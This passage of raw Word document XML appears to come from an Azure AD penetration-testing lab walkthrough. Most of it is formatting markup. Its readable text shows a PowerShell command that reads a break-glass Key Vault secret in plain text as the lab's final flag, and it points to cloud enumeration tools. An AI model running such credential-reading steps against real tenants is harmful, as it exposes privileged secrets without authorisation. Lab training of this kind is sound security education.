              <w:jc w:val="righ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r>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="5D6CF1E7" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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70A53D4"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Not Before</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768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223EC735" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="righ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r>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="7F5E1821" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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78906DB"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Created</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768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ED8D488"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 12/9/2021 7:18:22 PM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="4FBF25FC" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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57D0A911"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Updated</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768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AF2CD69"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 12/9/2021 7:18:22 PM</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="596218E8" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="255"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9090" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="732123AA"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Content Type :</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="67F6A319" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="270"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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236268B4" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>Tags</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768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115794DD" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:jc w:val="right"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>:</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="61C74493" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="45"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="141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BDBD47D" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="45" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="768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3B73BA85" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="45" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Calibri"/>
                <w:sz w:val="2"/>
                <w:szCs w:val="2"/>
              </w:rPr>
              <w:t> </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="349EA773" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="555" w:after="0" w:line="270" w:lineRule="atLeast"/>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There is a secret called 'PrivilegedAccess' inside the keyvault. Let's try to read the secret!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="458ABDC5" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:w="13200" w:type="dxa"/>
        <w:tblCellMar>
          <w:left w:w="0" w:type="dxa"/>
          <w:right w:w="0" w:type="dxa"/>
        </w:tblCellMar>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="13200"/>
      </w:tblGrid>
      <w:tr w:rsidR="005F73BB" w:rsidRPr="005F73BB" w14:paraId="4D68B715" w14:textId="77777777" w:rsidTr="005F73BB">
        <w:trPr>
          <w:trHeight w:val="240"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="4650" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:left w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="auto"/>
              <w:right w:val="single" w:sz="2" w:space="0" w:color="auto"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FBE4D5"/>
            <w:vAlign w:val="bottom"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="769F03FB" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
            <w:pPr>
              <w:spacing w:after="0" w:line="240" w:lineRule="atLeast"/>
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="005F73BB">
              <w:rPr>
                <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
                <w:b/>
                <w:bCs/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t>PS C:\AzAD\Tools&gt; Get-AzKeyVaultSecret -VaultName breakglass-vault -Name PrivilegedAccess -AsPlainText</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="4544870E" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="300" w:after="0" w:line="270" w:lineRule="atLeast"/>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The secret is your final flag!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70FE0989" w14:textId="77777777" w:rsidR="005F73BB" w:rsidRPr="005F73BB" w:rsidRDefault="005F73BB" w:rsidP="005F73BB">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FAFBFB"/>
        <w:spacing w:before="225" w:after="0" w:line="285" w:lineRule="atLeast"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005F73BB">
        <w:rPr>
          <w:rFonts w:ascii="Nunito" w:eastAsia="Times New Roman" w:hAnsi="Nunito" w:cs="Times New Roman"/>
          <w:color w:val="000000"/>
          <w:sz w:val="23"/>
          <w:szCs w:val="23"/>
        </w:rPr>
        <w:t>Once you complete the lab, please take time to explore more commands from the Azure AD and Az PowerShell module to gather information about the target environment. Also, try to use tools like az cli, ROADrecon, AzureHound, StormSpotter for enumeration and any other tools that you come across!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A132F1B" w14:textId="77777777" w:rsidR="00337A51" w:rsidRDefault="00337A51"/>
    <w:sectPr w:rsidR="00337A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charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00002FF" w:usb1="5000204B" w:usb2="00000000" w:usb3="00000000" w:csb0="00000197"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BB"/>
    <w:rsid w:val="00337A51"/>
    <w:rsid w:val="005F73BB"/>
    <w:rsid w:val="00F82F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A6150"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{0DCA9313-7724-4AA7-9F30-A0020B5AE0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5F73BB"/>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5F73BB"/>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5F73BB"/>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5F73BB"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="15"/>
      <w:szCs w:val="15"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p2">
    <w:name w:val="p2"/>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
    <w:name w:val="p4"/>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
    <w:name w:val="p5"/>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
    <w:name w:val="p3"/>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
    <w:name w:val="p8"/>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
    <w:name w:val="p9"/>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0">
    <w:name w:val="p10"/>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1">
    <w:name w:val="p11"/>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4">
    <w:name w:val="p14"/>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8">
    <w:name w:val="ft8"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005F73BB"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p15">
    <w:name w:val="p15"/>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6">
    <w:name w:val="ft6"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005F73BB"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p16">
    <w:name w:val="p16"/>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7">
    <w:name w:val="p17"/>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8">
    <w:name w:val="p18"/>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9">
    <w:name w:val="p19"/>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4">
    <w:name w:val="p24"/>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5">
    <w:name w:val="p25"/>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6">
    <w:name w:val="p26"/>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1">
    <w:name w:val="p21"/>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7">
    <w:name w:val="p27"/>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7">
    <w:name w:val="ft17"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005F73BB"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p28">
    <w:name w:val="p28"/>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29">
    <w:name w:val="p29"/>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0">
    <w:name w:val="p30"/>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8">
    <w:name w:val="ft18"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005F73BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ft19">
    <w:name w:val="ft19"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005F73BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ft20">
    <w:name w:val="ft20"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005F73BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ft21">
    <w:name w:val="ft21"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005F73BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ft22">
    <w:name w:val="ft22"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005F73BB"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="ft23">
    <w:name w:val="ft23"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005F73BB"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p31">
    <w:name w:val="p31"/>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2">
    <w:name w:val="p32"/>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7">
    <w:name w:val="p37"/>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5">
    <w:name w:val="ft5"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005F73BB"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p6">
    <w:name w:val="p6"/>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10">
    <w:name w:val="ft10"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005F73BB"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p34">
    <w:name w:val="p34"/>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39">
    <w:name w:val="p39"/>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0">
    <w:name w:val="p40"/>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1">
    <w:name w:val="p41"/>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2">
    <w:name w:val="p42"/>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3">
    <w:name w:val="p43"/>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4">
    <w:name w:val="p44"/>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5">
    <w:name w:val="p45"/>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7">
    <w:name w:val="p47"/>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8">
    <w:name w:val="p48"/>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9">
    <w:name w:val="p49"/>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0">
    <w:name w:val="p50"/>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1">
    <w:name w:val="p51"/>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2">
    <w:name w:val="p52"/>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4">
    <w:name w:val="p54"/>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5">
    <w:name w:val="p55"/>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6">
    <w:name w:val="p56"/>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7">
    <w:name w:val="p57"/>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58">
    <w:name w:val="p58"/>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t28">
    <w:name w:val="ft28"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="005F73BB"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="p59">
    <w:name w:val="p59"/>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0">
    <w:name w:val="p60"/>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1">
    <w:name w:val="p61"/>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2">
    <w:name w:val="p62"/>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3">
    <w:name w:val="p63"/>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4">
    <w:name w:val="p64"/>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5">
    <w:name w:val="p65"/>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6">
    <w:name w:val="p66"/>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7">
    <w:name w:val="p67"/>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8">
    <w:name w:val="p68"/>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69">
    <w:name w:val="p69"/>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0">
    <w:name w:val="p70"/>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1">
    <w:name w:val="p71"/>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2">
    <w:name w:val="p72"/>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3">
    <w:name w:val="p73"/>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4">
    <w:name w:val="p74"/>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5">
    <w:name w:val="p75"/>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6">
    <w:name w:val="p76"/>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t7">
    <w:name w:val="ft7"/>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t2">
    <w:name w:val="ft2"/>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79">
    <w:name w:val="p79"/>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t16">
    <w:name w:val="ft16"/>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2">
    <w:name w:val="p82"/>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3">
    <w:name w:val="p83"/>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4">
    <w:name w:val="p84"/>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5">
    <w:name w:val="p85"/>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6">
    <w:name w:val="p86"/>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7">
    <w:name w:val="p87"/>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8">
    <w:name w:val="p88"/>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89">
    <w:name w:val="p89"/>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0">
    <w:name w:val="p90"/>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1">
    <w:name w:val="p91"/>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2">
    <w:name w:val="p92"/>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3">
    <w:name w:val="p93"/>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4">
    <w:name w:val="p94"/>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5">
    <w:name w:val="p95"/>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6">
    <w:name w:val="p96"/>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7">
    <w:name w:val="p97"/>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46">
    <w:name w:val="p46"/>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8">
    <w:name w:val="p98"/>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99">
    <w:name w:val="p99"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="005F73B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44076">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="131481745">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
        </w:div>
        <w:div w:id="1504004388">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="0"/>
          <w:divBdr>
            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="290676126">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
            </w:div>
            <w:div w:id="277682346">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="2034644286">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1889605710">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="215628196">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="615331173">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="134495753">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                            </w:div>
                            <w:div w:id="1817063754">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="199348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41116652">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1645695578">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="40449043">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="306131181">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1154681570">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="126438520">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                  </w:divBdr>
                                  <w:divsChild>
                                    <w:div w:id="20686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666754">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="960191160">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="2085839116">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1789271886">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                          <w:divsChild>
                            <w:div w:id="1951617606">
                              <w:marLeft w:val="0"/>
                              <w:marRight w:val="0"/>
                              <w:marTop w:val="0"/>
                              <w:marBottom w:val="0"/>
                              <w:divBdr>
                                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                              </w:divBdr>
                              <w:divsChild>
                                <w:div w:id="1122961209">
                                  <w:marLeft w:val="0"/>
                                  <w:marRight w:val="0"/>
                                  <w:marTop w:val="0"/>
                                  <w:marBottom w:val="0"/>
                                  <w:divBdr>
                                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
